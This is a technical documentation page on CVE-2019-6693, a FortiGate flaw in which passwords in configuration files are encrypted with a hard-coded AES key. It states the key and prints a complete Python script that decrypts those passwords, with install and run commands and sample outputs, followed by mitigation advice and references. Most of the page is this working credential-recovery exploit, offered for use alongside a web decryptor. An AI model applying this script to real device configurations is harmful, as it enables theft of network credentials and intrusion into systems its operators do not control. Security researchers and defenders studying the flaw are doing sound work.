Exploiting CVE-2019-6693

Caution

As noted in the Tech Docs Overview, the information provided in this documentation is for educational and informational purposes only. Users are responsible for how they apply the knowledge gained from this documentation. Any actions taken that result in disruptions, damages, or violations of laws or regulations are the sole responsibility of the user. Always ensure compliance with applicable laws and best practices when following any documentation on this website.

Overview

What is CVE-2019-6693?

CVE-2019-6693 is a vulnerability that allows an authorized user to reverse encrypted passwords on a FortiGate device from the configuration file.

The CVE was published on 11/21/2019 and has a base score of 6.5.

It is associated with CWE-798: Use of Hard-coded Credentials.

Explaination

The vulnerability is due to the use of a hard-coded encryption key in the FortiOS firmware. The key is used to encrypt passwords stored in the configuration file. An attacker with access to the configuration file can reverse the encrypted passwords using the hard-coded key.

The hard coded key in question is the following: Mary had a littl

Exploitation

Exploitation requires access to the configuration file of the FortiGate device. The configuration file can be exported from the web UI or by running the show or show user local command in the CLI.

There are several scripts online to exploit this vulnerability, however, for the purpose of this documentation, we will use the following Python script:

cve-2019-6693.py

#!/usr/bin/env python3
import sys
import base64
from Crypto.Cipher import AES

def decrypt_password(encrypted_password):
    key = b'Mary had a littl'
    try:
        data = base64.b64decode(encrypted_password)
        iv = data[0:4] + b'\x00' * 12
        ct = data[4:]
        cipher = AES.new(key, AES.MODE_CBC, iv)
        pt = cipher.decrypt(ct)
        return pt.decode(errors='ignore').rstrip('\x00')
    except Exception as e:
        return str(pt).rstrip('\x00').lstrip("b'").rstrip("'")

def main():
    # Check if an argument was provided
    if len(sys.argv) < 2:
        print("Error: Please provide an encrypted password string.")
        print("Usage: ./cve-2019-6693.py <encrypted_password>")
        sys.exit(1)

    # Get the encrypted password from command line
    encrypted_password = sys.argv[1]

    # Decrypt the password
    try:
        decrypted_password = decrypt_password(encrypted_password)
        print(f"Decrypted password: {decrypted_password}")
    except Exception as e:
        print(f"Error decrypting password: {e}")

if __name__ == "__main__":
    main()

This Python script is a modified version based off of the saladandonionrings/cve-2019-6693 GitHub repository.

Usage

Ensure you have the pycryptodome library installed:

pip3 install pycryptodome

Mark the script as executable:

chmod +x cve-2019-6693.py

Run the script with the encrypted password as an argument:

./cve-2019-6693.py <encrypted_password>

Example:

$ ./cve-2019-6693.py LJZgRXgIhYYiLX7YjSDniG52S0K2AuZoVb+y15IIC5hkzONg
Decrypted password: test123_super_secret_password

$ ./cve-2019-6693.py uCn8uiVJqzzEm8iba4onCc98AJDiYggVSDlYIph+gjN3cjSSEvX8kSNfm+TjIzSlGnH5dm8rCd6aLgPipLPP2okahye7oZZxXfseBytbJ+7arJPz1e1mmnawL8/jFcl8g/SNNuSMo6q/f2Ilo7dnngJDZUfUeE2JiYpivmd5snDVadDoqOVRa8ji26I25r0IApELXg==
Decrypted password: guest)

Notes:

• You may notice the random trailing characters in the decrypted password. This is due to the padding used in the encryption process. You may need to validate the password yourself to ensure it is correct.
• There is a web based decryption tool at the bottom of this page if you do not want to run the script locally.

Mitigation

• It is recommended you change the hard-coded encryption key in the FortiOS configuration file. This can be done by following the steps outlined in the Trusted platform module support article on the Fortinet website.
• Ensure the FortiGate device is running the latest firmware to mitigate any other potential vulnerabilities.
• Do not share your configuration file without scrubbing sensitive information such as passwords, regardless if they are encrypted or hashed.

References and other information

• CVE-2019-6693
• CWE-798
• Decrypting FortiGate passwords (CVE-2019–6693)
• Give Me Your FortiGate Configuration Backup and I Rule Your Network
• Trusted platform module support
• FortiGard PSIRT FG-IR-19-007

Web Based Decryption Tool

Don’t want to run the script locally? You can use the web based decryption tool below:

CVE-2019-6693 Password Decryptor

Enter an encrypted FortiGate password to decrypt it using the known hard-coded key.

Encrypted Password:

Decrypt Password

Warning: This tool is for educational purposes only. Always ensure you have proper authorization before attempting to decrypt passwords.

Note: This tool decrypts passwords locally, there is no data within this form that is transmitted to any server.